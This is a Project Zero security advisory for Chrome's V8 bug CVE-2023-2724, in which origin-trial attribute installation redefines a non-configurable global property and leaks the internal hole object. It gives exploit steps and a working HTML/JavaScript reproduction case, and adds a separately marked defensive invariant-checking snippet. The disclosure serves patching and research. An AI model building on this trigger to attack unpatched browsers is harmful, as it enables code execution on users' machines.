Chrome Internal JavaScript Object Access Via Origin Trials
Chrome suffers from an internal JavaScript object access vulnerability that can be leveraged for arbitrary code execution.
Chrome: Internal JavaScript object access via Origin Trials
VULNERABILITY DETAILS
- JSObject::DefineAccessor doesn't ensure that the receiver object is in a valid state before creating an accessor property. This allows callers to extend non-extensible objects and reconfigure non-configurable properties.
- The function is reachable from IDLMemberInstaller::InstallAttributes:
IDLMemberInstaller::InstallAttributes -> InstallAttribute -> Object::SetAccessorProperty -> JSObject::DefineAccessor
- When an origin trial is activated through a meta tag, InstallAttributes might be called on a JS object that has already been modified by the user code.
- Some origin trials install attributes directly on the global object.
To exploit the issue:
- Add a non-configurable property to the global object.
- Compile a JS function that accesses the property. The compilation dependency in [1] will be skipped.
- Enable an origin trial that redefines the property as configurable.
- Delete the property.
After that, the compiled function will reference an invalid property cell and leak the internal hole object. This is a known vulnerable condition that can be abused to execute arbitrary code.
[1] https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/js-native-context-specialization.cc;drc=837cc12de25a288edf3ac222f7265c9936e69552;l=1164
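The property invariants that DefineAccessor skipped are the ordinary ECMAScript rules every engine must enforce; the check below (added here, not part of the Project Zero report) exercises them with Reflect calls, which return false instead of throwing, using the same property name as the reproduction case on a caller-supplied target. The same rules apply to globalThis, where the report's origin-trial installer violated them.

```javascript
// Added example (not from the report): the invariants a correct engine enforces
// on a non-configurable data property and on a non-extensible object.
// Reflect.* variants return false instead of throwing, so each check yields a boolean.
function checkPropertyInvariants(target, name = 'documentPictureInPicture') {
  const results = {};

  // 1. A non-configurable, writable data property, as in the report's PoC.
  Reflect.defineProperty(target, name, { configurable: false, writable: true, value: {} });
  const before = Reflect.getOwnPropertyDescriptor(target, name);
  results.nonConfigurable = before.configurable === false && before.writable === true;

  // 2. Turning it into an accessor (what an attribute installer does) must be rejected:
  //    a non-configurable data property can never become an accessor property.
  results.accessorRedefineRejected = !Reflect.defineProperty(target, name, {
    get() { return 42; }, configurable: true });

  // 3. Flipping configurable back to true must be rejected.
  results.reconfigureRejected = !Reflect.defineProperty(target, name, { configurable: true });

  // 4. delete must fail (false here; a TypeError in strict-mode code) and the slot must remain.
  results.deleteRejected = !Reflect.deleteProperty(target, name) && Reflect.has(target, name);

  // 5. A non-extensible object must not grow new properties, accessor or otherwise.
  const sealedLike = Object.preventExtensions({});
  results.extensionRejected = !Reflect.defineProperty(sealedLike, 'added', {
    get() { return 1; }, configurable: true });

  // 6. The slot itself stays writable: user code may still replace the value, as the PoC does.
  target[name] = { replaced: true };
  results.stillWritable = target[name].replaced === true;

  return results;
}

// Any `false` means an invariant the optimizing compiler relies on was broken: the report's
// compiled trigger() skipped a dependency because it trusted `configurable: false`.
function allInvariantsHold(target = {}) {
  return Object.values(checkPropertyInvariants(target)).every(Boolean);
}
```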
VERSION
Google Chrome 112.0.5615.49 (Official Build) (arm64)
Chromium 114.0.5713.0 (Developer Build) (64-bit)
REPRODUCTION CASE
<body>
<script>
var container = [{}];
function trigger() { container[0] = documentPictureInPicture; }
Reflect.defineProperty(
globalThis,
'documentPictureInPicture',
{ configurable: false, writable: true, value: {} });
documentPictureInPicture = {}; // Now `documentPictureInPicture` is a non-configurable mutable slot.
for (let i = 0; i < 50000; i++) trigger();
// The "Document Picture-in-Picture" origin trial force-sets the `documentPictureInPicture` property
// on the global object.
meta = document.createElement('meta');
meta.httpEquiv = 'Origin-Trial';
meta.content =
'AstD02iOsmKKlxPbuURr1i4CKzX6AhBpjqxCMNIinwFqsdNThmojsMI8B7m8GGlR/DNu9i6t4eqEfHvhuvSxHgQAAABe' +
'eyJvcmlnaW4iOiJodHRwOi8vbG9jYWxob3N0OjgwMDAiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJl' +
'QVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5fQ==';
document.head.appendChild(meta);
delete documentPictureInPicture;
trigger();
container[0].prop; // Trying to access a property of the hole object should cause a crash.
</script>
</body>
CREDIT INFORMATION
Sergei Glazunov of Google Project Zero
This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-07-13.
Related CVE Numbers: CVE-2023-2724.
Found by: [email protected]
CVE-2023-2724: Type confusion in V8 in Google Chrome prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)